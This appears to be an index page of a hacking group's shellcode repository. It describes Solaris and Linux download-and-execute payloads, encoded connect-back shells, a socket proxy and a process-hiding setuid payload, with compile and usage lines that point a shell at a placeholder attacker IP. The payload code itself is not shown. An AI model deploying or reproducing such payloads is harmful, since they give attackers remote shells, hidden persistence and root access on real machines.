"Never let school get in the way of learning."
-- Mark Twain
Here you will find Black Security's shellcode repository.
Solaris HTTP Download + Execute Shellcode
Now you can download and exec a Solaris stage 2 with this nice payload from xort. Enjoy!
black-dl-exec-SOLARIS.c (MIPS) [278:bytes]
Downloads a binary named 'evil-dl' from the given host to '/tmp/ff', then executes it.
11.21.6 Russell Sanford (xort@blacksecurity.org)
gcc -lnsl black-dl-exec-SOLARIS.c -o bdes
Solaris Session Encoded TCP Connect-back Shell with Client
black-RXenc-con-back-SOLARIS.c (MIPS)
This is a relatively small (600 byte) shellcode that encodes all network traffic between the exploited process and the attacker. All clear-text shell I/O is encoded using a simple NOT algorithm before being transmitted on the wire.
7.21.6 Russell Sanford (xort@blacksecurity.org)
linux/x86 examples of long-term payloads: hide-wait-change
#=============================================================================================#
# hide-wait-change (final v4) #
# ------------------------------------------------------------------------------------------- #
# Author: xort (xort@blacksecurity.org) #
# Date: 09/14/2005 3:35pm #
# Type: shellcode/(x86-linux).s, (at&t) #
# Size: strlen(fake-proc-name) + strlen(file-to-change) + 187 #
# Description: This is a shellcode that will infect a process, play some argv[0] games among #
# other tricks to hide itself from 'ps', and waits until the creation of a #
# specified file. Once this file is found to exist, its permissions are changed #
# to 04555. Original concept conceived by izik. #
###############################################################################################
linux/x86 socket-proxy shellcode 372 bytes
/*---------------------------------------------------------------------------*
* 372 byte socket-proxy shellcode *
* by Russell Sanford - xort@blacksecurity.org *
*---------------------------------------------------------------------------*
* filename: x86-linux-bounce-proxy.c *
* date: 12/23/2005 *
* info: Compiled with DTP Project. *
* description: This is a x86-linux proxy shellcode. This is probably best *
* used in stage 2 situations. The syntax for invoking the *
* patchcode is as follows: *
* *
* patchcode(shellcode,31337,"11.22.33.44",80); *
* *
* Where 31337 is the port to listen to on the remote host *
*---------------------------------------------------------------------------*/
Linux/x86 Connect Back shellcode 90 bytes
/*---------------------------------------------------------------------------*
* 90 byte Connect Back shellcode *
* by Russell Sanford - xort@blacksecurity.org *
*---------------------------------------------------------------------------*
* filename: x86-linux-connect-back.c *
* info: Compiled with DTP Project. *
* description: This is a x86-linux connect back shellcode. Just invoke *
* the function patchcode() before using shellcode. The format *
* for invoking patchcode is as follows: *
* *
* patchcode(shellcode,"11.22.33.44",31337); *
*---------------------------------------------------------------------------*/
XOR-Encoded Remote Connect Back Shellcode
XOR-Encoded Remote Connect Back Shellcode written by XORt. This includes a C client as well as the shellcode connect-back server agent. We are not responsible for what this code may cause.